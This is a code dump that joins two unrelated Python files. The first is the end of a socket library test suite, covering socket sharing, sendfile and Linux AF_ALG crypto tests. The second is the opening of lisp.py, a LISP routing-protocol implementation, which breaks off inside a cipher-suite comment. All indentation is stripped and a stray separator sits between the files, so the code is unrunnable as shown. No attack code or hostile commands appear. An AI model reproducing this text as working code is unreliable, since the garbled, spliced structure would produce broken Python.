def remoteProcessServer(cls, q):
# Recreate socket from shared data
sdata = q.get()
message = q.get()
s = socket.fromshare(sdata)
s2, c = s.accept()
# Send the message
s2.sendall(message)
s2.close()
s.close()
def testShare(self):
# Transfer the listening server socket to another process
# and service it from there.
# Create process:
q = multiprocessing.Queue()
p = multiprocessing.Process(target=self.remoteProcessServer, args=(q,))
p.start()
# Get the shared socket data
data = self.serv.share(p.pid)
# Pass the shared socket to the other process
addr = self.serv.getsockname()
self.serv.close()
q.put(data)
# The data that the server will send us
message = b"slapmahfro"
q.put(message)
# Connect
s = socket.create_connection(addr)
# listen for the data
m = []
while True:
data = s.recv(100)
if not data:
break
m.append(data)
s.close()
received = b"".join(m)
self.assertEqual(received, message)
p.join()
def testShareLength(self):
data = self.serv.share(os.getpid())
self.assertRaises(ValueError, socket.fromshare, data[:-1])
self.assertRaises(ValueError, socket.fromshare, data+b"foo")
def compareSockets(self, org, other):
# socket sharing is expected to work only for blocking socket
# since the internal python timeout value isn't transferred.
self.assertEqual(org.gettimeout(), None)
self.assertEqual(org.gettimeout(), other.gettimeout())
self.assertEqual(org.family, other.family)
self.assertEqual(org.type, other.type)
# If the user specified "0" for proto, then
# internally windows will have picked the correct value.
# Python introspection on the socket however will still return
# 0. For the shared socket, the python value is recreated
# from the actual value, so it may not compare correctly.
if org.proto != 0:
self.assertEqual(org.proto, other.proto)
def testShareLocal(self):
data = self.serv.share(os.getpid())
s = socket.fromshare(data)
try:
self.compareSockets(self.serv, s)
finally:
s.close()
def testTypes(self):
families = [socket.AF_INET, socket.AF_INET6]
types = [socket.SOCK_STREAM, socket.SOCK_DGRAM]
for f in families:
for t in types:
try:
source = socket.socket(f, t)
except OSError:
continue # This combination is not supported
try:
data = source.share(os.getpid())
shared = socket.fromshare(data)
try:
self.compareSockets(source, shared)
finally:
shared.close()
finally:
source.close()
class SendfileUsingSendTest(ThreadedTCPSocketTest):
"""
Test the send() implementation of socket.sendfile().
"""
FILESIZE = (10 * 1024 * 1024) # 10 MiB
BUFSIZE = 8192
FILEDATA = b""
TIMEOUT = 2
@classmethod
def setUpClass(cls):
def chunks(total, step):
assert total >= step
while total > step:
yield step
total -= step
if total:
yield total
chunk = b"".join([random.choice(string.ascii_letters).encode()
for i in range(cls.BUFSIZE)])
with open(support.TESTFN, 'wb') as f:
for csize in chunks(cls.FILESIZE, cls.BUFSIZE):
f.write(chunk)
with open(support.TESTFN, 'rb') as f:
cls.FILEDATA = f.read()
assert len(cls.FILEDATA) == cls.FILESIZE
@classmethod
def tearDownClass(cls):
support.unlink(support.TESTFN)
def accept_conn(self):
self.serv.settimeout(MAIN_TIMEOUT)
conn, addr = self.serv.accept()
conn.settimeout(self.TIMEOUT)
self.addCleanup(conn.close)
return conn
def recv_data(self, conn):
received = []
while True:
chunk = conn.recv(self.BUFSIZE)
if not chunk:
break
received.append(chunk)
return b''.join(received)
def meth_from_sock(self, sock):
# Depending on the mixin class being run return either send()
# or sendfile() method implementation.
return getattr(sock, "_sendfile_use_send")
# regular file
def _testRegularFile(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, self.FILESIZE)
self.assertEqual(file.tell(), self.FILESIZE)
def testRegularFile(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# non regular file
def _testNonRegularFile(self):
address = self.serv.getsockname()
file = io.BytesIO(self.FILEDATA)
with socket.create_connection(address) as sock, file as file:
sent = sock.sendfile(file)
self.assertEqual(sent, self.FILESIZE)
self.assertEqual(file.tell(), self.FILESIZE)
self.assertRaises(socket._GiveupOnSendfile,
sock._sendfile_use_sendfile, file)
def testNonRegularFile(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# empty file
def _testEmptyFileSend(self):
address = self.serv.getsockname()
filename = support.TESTFN + "2"
with open(filename, 'wb'):
self.addCleanup(support.unlink, filename)
file = open(filename, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, 0)
self.assertEqual(file.tell(), 0)
def testEmptyFileSend(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(data, b"")
# offset
def _testOffset(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file, offset=5000)
self.assertEqual(sent, self.FILESIZE - 5000)
self.assertEqual(file.tell(), self.FILESIZE)
def testOffset(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE - 5000)
self.assertEqual(data, self.FILEDATA[5000:])
# count
def _testCount(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 5000007
meth = self.meth_from_sock(sock)
sent = meth(file, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count)
def testCount(self):
count = 5000007
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[:count])
# count small
def _testCountSmall(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 1
meth = self.meth_from_sock(sock)
sent = meth(file, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count)
def testCountSmall(self):
count = 1
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[:count])
# count + offset
def _testCountWithOffset(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 100007
meth = self.meth_from_sock(sock)
sent = meth(file, offset=2007, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count + 2007)
def testCountWithOffset(self):
count = 100007
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[2007:count+2007])
# non blocking sockets are not supposed to work
def _testNonBlocking(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
sock.setblocking(False)
meth = self.meth_from_sock(sock)
self.assertRaises(ValueError, meth, file)
self.assertRaises(ValueError, sock.sendfile, file)
def testNonBlocking(self):
conn = self.accept_conn()
if conn.recv(8192):
self.fail('was not supposed to receive any data')
# timeout (non-triggered)
def _testWithTimeout(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, self.FILESIZE)
def testWithTimeout(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# timeout (triggered)
def _testWithTimeoutTriggeredSend(self):
address = self.serv.getsockname()
with open(support.TESTFN, 'rb') as file:
with socket.create_connection(address) as sock:
sock.settimeout(0.01)
meth = self.meth_from_sock(sock)
self.assertRaises(socket.timeout, meth, file)
def testWithTimeoutTriggeredSend(self):
conn = self.accept_conn()
conn.recv(88192)
# errors
def _test_errors(self):
pass
def test_errors(self):
with open(support.TESTFN, 'rb') as file:
with socket.socket(type=socket.SOCK_DGRAM) as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(
ValueError, "SOCK_STREAM", meth, file)
with open(support.TESTFN, 'rt') as file:
with socket.socket() as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(
ValueError, "binary mode", meth, file)
with open(support.TESTFN, 'rb') as file:
with socket.socket() as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(TypeError, "positive integer",
meth, file, count='2')
self.assertRaisesRegex(TypeError, "positive integer",
meth, file, count=0.1)
self.assertRaisesRegex(ValueError, "positive integer",
meth, file, count=0)
self.assertRaisesRegex(ValueError, "positive integer",
meth, file, count=-1)
@unittest.skipUnless(hasattr(os, "sendfile"),
'os.sendfile() required for this test.')
class SendfileUsingSendfileTest(SendfileUsingSendTest):
"""
Test the sendfile() implementation of socket.sendfile().
"""
def meth_from_sock(self, sock):
return getattr(sock, "_sendfile_use_sendfile")
@unittest.skipUnless(HAVE_SOCKET_ALG, 'AF_ALG required')
class LinuxKernelCryptoAPI(unittest.TestCase):
# tests for AF_ALG
def create_alg(self, typ, name):
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
try:
sock.bind((typ, name))
except FileNotFoundError as e:
# type / algorithm is not available
sock.close()
raise unittest.SkipTest(str(e), typ, name)
else:
return sock
# bpo-31705: On kernel older than 4.5, sendto() failed with ENOKEY,
# at least on ppc64le architecture
@support.requires_linux_version(4, 5)
def test_sha256(self):
expected = bytes.fromhex("ba7816bf8f01cfea414140de5dae2223b00361a396"
"177a9cb410ff61f20015ad")
with self.create_alg('hash', 'sha256') as algo:
op, _ = algo.accept()
with op:
op.sendall(b"abc")
self.assertEqual(op.recv(512), expected)
op, _ = algo.accept()
with op:
op.send(b'a', socket.MSG_MORE)
op.send(b'b', socket.MSG_MORE)
op.send(b'c', socket.MSG_MORE)
op.send(b'')
self.assertEqual(op.recv(512), expected)
def test_hmac_sha1(self):
expected = bytes.fromhex("effcdf6ae5eb2fa2d27416d5f184df9c259a7c79")
with self.create_alg('hash', 'hmac(sha1)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, b"Jefe")
op, _ = algo.accept()
with op:
op.sendall(b"what do ya want for nothing?")
self.assertEqual(op.recv(512), expected)
# Although it should work with 3.19 and newer the test blocks on
# Ubuntu 15.10 with Kernel 4.2.0-19.
@support.requires_linux_version(4, 3)
def test_aes_cbc(self):
key = bytes.fromhex('06a9214036b8a15b512e03d534120006')
iv = bytes.fromhex('3dafba429d9eb430b422da802c9fac41')
msg = b"Single block msg"
ciphertext = bytes.fromhex('e353779c1079aeb82708942dbe77181a')
msglen = len(msg)
with self.create_alg('skcipher', 'cbc(aes)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, key)
op, _ = algo.accept()
with op:
op.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, iv=iv,
flags=socket.MSG_MORE)
op.sendall(msg)
self.assertEqual(op.recv(msglen), ciphertext)
op, _ = algo.accept()
with op:
op.sendmsg_afalg([ciphertext],
op=socket.ALG_OP_DECRYPT, iv=iv)
self.assertEqual(op.recv(msglen), msg)
# long message
multiplier = 1024
longmsg = [msg] * multiplier
op, _ = algo.accept()
with op:
op.sendmsg_afalg(longmsg,
op=socket.ALG_OP_ENCRYPT, iv=iv)
enc = op.recv(msglen * multiplier)
self.assertEqual(len(enc), msglen * multiplier)
self.assertEqual(enc[:msglen], ciphertext)
op, _ = algo.accept()
with op:
op.sendmsg_afalg([enc],
op=socket.ALG_OP_DECRYPT, iv=iv)
dec = op.recv(msglen * multiplier)
self.assertEqual(len(dec), msglen * multiplier)
self.assertEqual(dec, msg * multiplier)
@support.requires_linux_version(4, 9) # see issue29324
def test_aead_aes_gcm(self):
key = bytes.fromhex('c939cc13397c1d37de6ae0e1cb7c423c')
iv = bytes.fromhex('b3d8cc017cbb89b39e0f67e2')
plain = bytes.fromhex('c3b3c41f113a31b73d9a5cd432103069')
assoc = bytes.fromhex('24825602bd12a984e0092d3e448eda5f')
expected_ct = bytes.fromhex('93fe7d9e9bfd10348a5606e5cafa7354')
expected_tag = bytes.fromhex('0032a1dc85f1c9786925a2e71d8272dd')
taglen = len(expected_tag)
assoclen = len(assoc)
with self.create_alg('aead', 'gcm(aes)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, key)
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_AEAD_AUTHSIZE,
None, taglen)
# send assoc, plain and tag buffer in separate steps
op, _ = algo.accept()
with op:
op.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, iv=iv,
assoclen=assoclen, flags=socket.MSG_MORE)
op.sendall(assoc, socket.MSG_MORE)
op.sendall(plain)
res = op.recv(assoclen + len(plain) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# now with msg
op, _ = algo.accept()
with op:
msg = assoc + plain
op.sendmsg_afalg([msg], op=socket.ALG_OP_ENCRYPT, iv=iv,
assoclen=assoclen)
res = op.recv(assoclen + len(plain) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# create anc data manually
pack_uint32 = struct.Struct('I').pack
op, _ = algo.accept()
with op:
msg = assoc + plain
op.sendmsg(
[msg],
([socket.SOL_ALG, socket.ALG_SET_OP, pack_uint32(socket.ALG_OP_ENCRYPT)],
[socket.SOL_ALG, socket.ALG_SET_IV, pack_uint32(len(iv)) + iv],
[socket.SOL_ALG, socket.ALG_SET_AEAD_ASSOCLEN, pack_uint32(assoclen)],
)
)
res = op.recv(len(msg) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# decrypt and verify
op, _ = algo.accept()
with op:
msg = assoc + expected_ct + expected_tag
op.sendmsg_afalg([msg], op=socket.ALG_OP_DECRYPT, iv=iv,
assoclen=assoclen)
res = op.recv(len(msg) - taglen)
self.assertEqual(plain, res[assoclen:])
@support.requires_linux_version(4, 3) # see test_aes_cbc
def test_drbg_pr_sha256(self):
# deterministic random bit generator, prediction resistance, sha256
with self.create_alg('rng', 'drbg_pr_sha256') as algo:
extra_seed = os.urandom(32)
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, extra_seed)
op, _ = algo.accept()
with op:
rn = op.recv(32)
self.assertEqual(len(rn), 32)
def test_sendmsg_afalg_args(self):
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
with sock:
with self.assertRaises(TypeError):
sock.sendmsg_afalg()
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=None)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(1)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, assoclen=None)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, assoclen=-1)
def test_length_restriction(self):
# bpo-35050, off-by-one error in length check
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
self.addCleanup(sock.close)
# salg_type[14]
with self.assertRaises(FileNotFoundError):
sock.bind(("t" * 13, "name"))
with self.assertRaisesRegex(ValueError, "type too long"):
sock.bind(("t" * 14, "name"))
# salg_name[64]
with self.assertRaises(FileNotFoundError):
sock.bind(("type", "n" * 63))
with self.assertRaisesRegex(ValueError, "name too long"):
sock.bind(("type", "n" * 64))
@unittest.skipUnless(sys.platform.startswith("win"), "requires Windows")
class TestMSWindowsTCPFlags(unittest.TestCase):
knownTCPFlags = {
# available since long time ago
'TCP_MAXSEG',
'TCP_NODELAY',
# available starting with Windows 10 1607
'TCP_FASTOPEN',
# available starting with Windows 10 1703
'TCP_KEEPCNT',
# available starting with Windows 10 1709
'TCP_KEEPIDLE',
'TCP_KEEPINTVL'
}
def test_new_tcp_flags(self):
provided = [s for s in dir(socket) if s.startswith('TCP')]
unknown = [s for s in provided if s not in self.knownTCPFlags]
self.assertEqual([], unknown,
"New TCP flags were discovered. See bpo-32394 for more information")
def test_main():
tests = [GeneralModuleTests, BasicTCPTest, TCPCloserTest, TCPTimeoutTest,
TestExceptions, BufferIOTest, BasicTCPTest2, BasicUDPTest, UDPTimeoutTest ]
tests.extend([
NonBlockingTCPTests,
FileObjectClassTestCase,
UnbufferedFileObjectClassTestCase,
LineBufferedFileObjectClassTestCase,
SmallBufferedFileObjectClassTestCase,
UnicodeReadFileObjectClassTestCase,
UnicodeWriteFileObjectClassTestCase,
UnicodeReadWriteFileObjectClassTestCase,
NetworkConnectionNoServer,
NetworkConnectionAttributesTest,
NetworkConnectionBehaviourTest,
ContextManagersTest,
InheritanceTest,
NonblockConstantTest
])
tests.append(BasicSocketPairTest)
tests.append(TestUnixDomain)
tests.append(TestLinuxAbstractNamespace)
tests.extend([TIPCTest, TIPCThreadableTest])
tests.extend([BasicCANTest, CANTest])
tests.extend([BasicRDSTest, RDSTest])
tests.append(LinuxKernelCryptoAPI)
tests.extend([
BasicVSOCKTest,
ThreadedVSOCKSocketStreamTest,
])
tests.extend([
CmsgMacroTests,
SendmsgUDPTest,
RecvmsgUDPTest,
RecvmsgIntoUDPTest,
SendmsgUDP6Test,
RecvmsgUDP6Test,
RecvmsgRFC3542AncillaryUDP6Test,
RecvmsgIntoRFC3542AncillaryUDP6Test,
RecvmsgIntoUDP6Test,
SendmsgTCPTest,
RecvmsgTCPTest,
RecvmsgIntoTCPTest,
SendmsgSCTPStreamTest,
RecvmsgSCTPStreamTest,
RecvmsgIntoSCTPStreamTest,
SendmsgUnixStreamTest,
RecvmsgUnixStreamTest,
RecvmsgIntoUnixStreamTest,
RecvmsgSCMRightsStreamTest,
RecvmsgIntoSCMRightsStreamTest,
# These are slow when setitimer() is not available
InterruptedRecvTimeoutTest,
InterruptedSendTimeoutTest,
TestSocketSharing,
SendfileUsingSendTest,
SendfileUsingSendfileTest,
])
tests.append(TestMSWindowsTCPFlags)
thread_info = support.threading_setup()
support.run_unittest(*tests)
support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
lisp.py
|
# -----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - Dino Farinacci <farinacci@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -----------------------------------------------------------------------------
#
# lisp.py
#
# This file contains all constants, definitions, data structures, packet
# send and receive functions for the LISP protocol according to RFC 6830.
#
#------------------------------------------------------------------------------
import socket
import time
import struct
import binascii
import hmac
import hashlib
import datetime
import os
import sys
import random
import threading
import operator
import netifaces
import platform
import Queue
import traceback
from Crypto.Cipher import AES
import ecdsa
import json
import commands
import copy
import chacha
import poly1305
from geopy.distance import vincenty
import curve25519
use_chacha = (os.getenv("LISP_USE_CHACHA") != None)
use_poly = (os.getenv("LISP_USE_POLY") != None)
#
# For printing the lisp_rloc_probe_list{}.
#
lisp_print_rloc_probe_list = False
#------------------------------------------------------------------------------
#
# Global variables.
#
lisp_hostname = ""
lisp_version = ""
lisp_uptime = ""
lisp_i_am_core = False
lisp_i_am_itr = False
lisp_i_am_etr = False
lisp_i_am_rtr = False
lisp_i_am_mr = False
lisp_i_am_ms = False
lisp_i_am_ddt = False
lisp_log_id = ""
lisp_debug_logging = True
lisp_map_notify_queue = {} # Key is concat of nonce and etr address
lisp_map_servers_list = {} # Key is ms-name/address string, value lisp_ms()
lisp_ddt_map_requestQ = {}
lisp_db_list = [] # Elements are class lisp_mapping()
lisp_group_mapping_list = {} # Elements are class lisp_group_mapping()
lisp_map_resolvers_list = {} # Key is mr-name/address string, value lisp_mr()
lisp_rtr_list = {} # Key is address string, value is lisp_address()
lisp_elp_list = {}
lisp_rle_list = {}
lisp_geo_list = {}
lisp_json_list = {}
lisp_myrlocs = [None, None, None]
lisp_mymacs = {}
#
# Used for multi-tenancy. First dictionary array is indexed by device name
# and second one has value lisp_interface() indexed by a instance-id string.
#
lisp_myinterfaces = {}
lisp_iid_to_interface = {}
lisp_multi_tenant_interfaces = []
lisp_test_mr_timer = None
lisp_rloc_probe_timer = None
#
# Stats variables.
#
lisp_registered_count = 0
#
# For tracking Map-Requesters behind NAT devices.
#
lisp_info_sources_by_address = {}
lisp_info_sources_by_nonce = {}
#
# Store computed keys per RLOC. The key is the nonce from the Map-Request
# at the time creates the g, p, and public-key values. The value is an
# array of 4 elements, indexed by key-id.
#
lisp_crypto_keys_by_nonce = {}
lisp_crypto_keys_by_rloc_encap = {} # Key is "<rloc>:<port>" tuple
lisp_crypto_keys_by_rloc_decap = {} # Key is "<rloc>:<port>" tuple
lisp_data_plane_security = False
lisp_search_decap_keys = True
lisp_data_plane_logging = False
lisp_frame_logging = False
lisp_flow_logging = False
#
# When NAT-traversal is enabled and lisp-crypto is enabled, an ITR needs
# to send RLOC-probe requests with an ephemeral port that is also used
# for data encapsulation to the RTR. This way the RTR can find the crypto
# key when multiple xTRs are behind the same NAT.
#
lisp_crypto_ephem_port = None
#
# Is the lisp-itr process running as a PITR?
#
lisp_pitr = False
#
# Are we listening on all MAC frames?
#
lisp_l2_overlay = False
#
# RLOC-probing variables. And for NAT-traversal, register only reachable
# RTRs which is determined from the lisp_rloc_probe_list.
#
lisp_rloc_probing = False
lisp_rloc_probe_list = {}
#
# Command "lisp xtr-parameters" register-reachabile-rtrs has opposite polarity
# to lisp_register_all_rtrs. So by default we do not consider RLOC-probing
# reachability status in registering RTRs to the mapping system.
#
lisp_register_all_rtrs = True
#
# Nonce Echo variables.
#
lisp_nonce_echoing = False
lisp_nonce_echo_list = {}
#
# xTR configuration parameters.
#
lisp_nat_traversal = False
#
# xTR configuration parameters. This flag is used to indicate that when a
# map-cache entry is created or updated, that we write specific information
# to say a Broadcom chip, that will do VXLAN encapsulation. This is a way
# to get existing hardware to do L3 overlays with the LISP control-plane
# when all it supports is VXLAN. See lisp_program_vxlan_hardware()
#
lisp_program_hardware = False
#
# Should we write to the lisp.checkpoint file.
#
lisp_checkpoint_map_cache = False
lisp_checkpoint_filename = "./lisp.checkpoint"
#
# Should we write map-cache entries to a named socket for another data-plane?
#
lisp_ipc_data_plane = False
lisp_ipc_dp_socket = None
lisp_ipc_dp_socket_name = "lisp-ipc-data-plane"
#
# This lock is used so the lisp-core process doesn't intermix command
# processing data with show data and packet data.
#
lisp_ipc_lock = None
#
# Use this as a default instance-ID when there are no "lisp interface" commands
# configured. This default instance-ID is taken from the first database-mapping
# command.
#
lisp_default_iid = 0
#
# Configured list of RTRs that the lisp-core process will insert into
# Info-Reply messages.
#
lisp_ms_rtr_list = [] # Array of type lisp.lisp_address()
#
# Used in an RTR to store a translated port for a translated RLOC. Key is
# hostname that is sent in a Info-Request is a nested array. See
# lisp_store_nat_info() for details.
#
lisp_nat_state_info = {}
#
# Used for doing global rate-limiting of Map-Requests.
#
lisp_last_map_request_sent = None
#
# Array to store 1000 flows.
#
LISP_FLOW_LOG_SIZE = 100
lisp_flow_log = []
#
# Store configured or API added policy parameters.
#
lisp_policies = {}
#
# Load-split pings. We'll has the first long of a ICMP echo-request and
# echo-reply for testing purposes. To show per packet load-splitting.
#
lisp_load_split_pings = False
#
# This array is a configured list of IPv6-prefixes that define what part
# of a matching address is used as the crypto-hash. They must be on 4-bit
# boundaries for easy matching.
#
lisp_eid_hashes = []
#
# IPv4 reassembly buffer. We pcapture IPv4 fragments. They can come to the ETR
# when IPv6 is encapsulated in IPv4 and we have an MTU violation for the
# encapsulated packet. The array is index by the IPv4 ident field and contains
# an array of packet buffers. Once all fragments have arrived, the IP header
# is removed from all fragments except the first one.
#
lisp_reassembly_queue = {}
#
# Map-Server pubsub cache. Remember Map-Requesters that set the N-bit for
# a EID target it is requesting. Key is EID-prefix in string format with
# bracketed instance-ID included in slash format. The value of the dictionary
# array is a dictionary array of ITR addresses in string format.
#
lisp_pubsub_cache = {}
#
# When "decentralized-push-xtr = yes" is configured, the xTR is also running as
# a Map-Server and Map-Resolver. So Map-Register messages the ETR sends is
# looped back to the lisp-ms process.
#
lisp_decent_push_configured = False
#
# When "decentralized-pull-xtr-[modulus,dns-suffix] is configured, the xTR is
# also running as a Map-Server and Map-Resolver. So Map-Register messages the
# ETR sends is looped back to the lisp-ms process.
#
lisp_decent_modulus = 0
lisp_decent_dns_suffix = None
#
# lisp.lisp_ipc_socket is used by the lisp-itr process during RLOC-probing
# to send the lisp-etr process status about RTRs learned. This is part of
# NAT-traversal support.
#
lisp_ipc_socket = None
#
# Configured in the "lisp encryption-keys" command.
#
lisp_ms_encryption_keys = {}
#
# Used to stare NAT translated address state in an RTR when a ltr client
# is sending RLOC-based LISP-Trace messages. If the RTR encounters any
# LISP-Trace error proessing called from lisp_rtr_data_plane() then it
# can return a partially filled LISP-Trace packet to the ltr client that
# site behind a NAT device.
#
# Dictiionary array format is:
# key = self.local_addr + ":" + self.local_port
# lisp_rtr_nat_trace_cache[key] = (translated_rloc, translated_port)
#
# And the array elements are added in lisp_trace.rtr_cache_nat_trace().
#
lisp_rtr_nat_trace_cache = {}
#------------------------------------------------------------------------------
#
# UDP ports used by LISP.
#
LISP_DATA_PORT = 4341
LISP_CTRL_PORT = 4342
LISP_L2_DATA_PORT = 8472
LISP_VXLAN_DATA_PORT = 4789
LISP_VXLAN_GPE_PORT = 4790
LISP_TRACE_PORT = 2434
#
# Packet type definitions.
#
LISP_MAP_REQUEST = 1
LISP_MAP_REPLY = 2
LISP_MAP_REGISTER = 3
LISP_MAP_NOTIFY = 4
LISP_MAP_NOTIFY_ACK = 5
LISP_MAP_REFERRAL = 6
LISP_NAT_INFO = 7
LISP_ECM = 8
LISP_TRACE = 9
#
# Map-Reply action values.
#
LISP_NO_ACTION = 0
LISP_NATIVE_FORWARD_ACTION = 1
LISP_SEND_MAP_REQUEST_ACTION = 2
LISP_DROP_ACTION = 3
LISP_POLICY_DENIED_ACTION = 4
LISP_AUTH_FAILURE_ACTION = 5
lisp_map_reply_action_string = ["no-action", "native-forward",
"send-map-request", "drop-action", "policy-denied", "auth-failure" ]
#
# Various HMACs alg-ids and lengths (in bytes) used by LISP.
#
LISP_NONE_ALG_ID = 0
LISP_SHA_1_96_ALG_ID = 1
LISP_SHA_256_128_ALG_ID = 2
LISP_MD5_AUTH_DATA_LEN = 16
LISP_SHA1_160_AUTH_DATA_LEN = 20
LISP_SHA2_256_AUTH_DATA_LEN = 32
#
# LCAF types as defined in draft-ietf-lisp-lcaf.
#
LISP_LCAF_NULL_TYPE = 0
LISP_LCAF_AFI_LIST_TYPE = 1
LISP_LCAF_INSTANCE_ID_TYPE = 2
LISP_LCAF_ASN_TYPE = 3
LISP_LCAF_APP_DATA_TYPE = 4
LISP_LCAF_GEO_COORD_TYPE = 5
LISP_LCAF_OPAQUE_TYPE = 6
LISP_LCAF_NAT_TYPE = 7
LISP_LCAF_NONCE_LOC_TYPE = 8
LISP_LCAF_MCAST_INFO_TYPE = 9
LISP_LCAF_ELP_TYPE = 10
LISP_LCAF_SECURITY_TYPE = 11
LISP_LCAF_SOURCE_DEST_TYPE = 12
LISP_LCAF_RLE_TYPE = 13
LISP_LCAF_JSON_TYPE = 14
LISP_LCAF_KV_TYPE = 15
LISP_LCAF_ENCAP_TYPE = 16
#
# TTL constant definitions.
#
LISP_MR_TTL = (24*60)
LISP_REGISTER_TTL = 3
LISP_SHORT_TTL = 1
LISP_NMR_TTL = 15
LISP_SITE_TIMEOUT_CHECK_INTERVAL = 60 # In units of seconds
LISP_PUBSUB_TIMEOUT_CHECK_INTERVAL = 60 # In units of seconds
LISP_REFERRAL_TIMEOUT_CHECK_INTERVAL = 60 # In units of seconds
LISP_TEST_MR_INTERVAL = 60 # In units of seconds
LISP_MAP_NOTIFY_INTERVAL = 2 # In units of seconds
LISP_DDT_MAP_REQUEST_INTERVAL = 2 # In units of seconds
LISP_MAX_MAP_NOTIFY_RETRIES = 3
LISP_INFO_INTERVAL = 15 # In units of seconds
LISP_MAP_REQUEST_RATE_LIMIT = 5 # In units of seconds
#LISP_RLOC_PROBE_TTL = 255
LISP_RLOC_PROBE_TTL = 64
LISP_RLOC_PROBE_INTERVAL = 10 # In units of seconds
LISP_RLOC_PROBE_REPLY_WAIT = 15 # In units of seconds
#LISP_RLOC_PROBE_INTERVAL = 60 # In units of seconds
LISP_DEFAULT_DYN_EID_TIMEOUT = 15 # In units of seconds
LISP_NONCE_ECHO_INTERVAL = 10 # In units of seconds
#
# Cipher Suites defined in RFC 8061:
#
# Cipher Suite 0:
# Reserved
#
# Cipher Suite 1 (LISP_2048MODP_AES128_CBC_SHA256):
# Diffie-Hellman Group: 2048-bit MODP [RFC3526]
# Encryption: AES with 128-bit keys in CBC mode [AES-CBC]
# Integrity: Integrated with AEAD_AES_128_CBC_HMAC_SHA_256 [AES-CBC]
# IV length: 16 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 2 (LISP_EC25519_AES128_CBC_SHA256):
# Diffie-Hellman Group: 256-bit Elliptic-Curve 25519 [CURVE25519]
# Encryption: AES with 128-bit keys in CBC mode [AES-CBC]
# Integrity: Integrated with AEAD_AES_128_CBC_HMAC_SHA_256 [AES-CBC]
# IV length: 16 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 3 (LISP_2048MODP_AES128_GCM):
# Diffie-Hellman Group: 2048-bit MODP [RFC3526]
# Encryption: AES with 128-bit keys in GCM mode [RFC5116]
# Integrity: Integrated with AEAD_AES_128_GCM [RFC5116]
# IV length: 12 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 4 (LISP_3072MODP_AES128_GCM):
# Diffie-Hellman Group: 3072-bit MODP [RFC3526]
# Encryption: AES with 128-bit keys in GCM mode [RFC5116]
# Integrity: Integrated with AEAD_AES_128_GCM [RFC5116]
# IV length: 12 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 5 (LISP_256_EC25519_AES128_GCM):
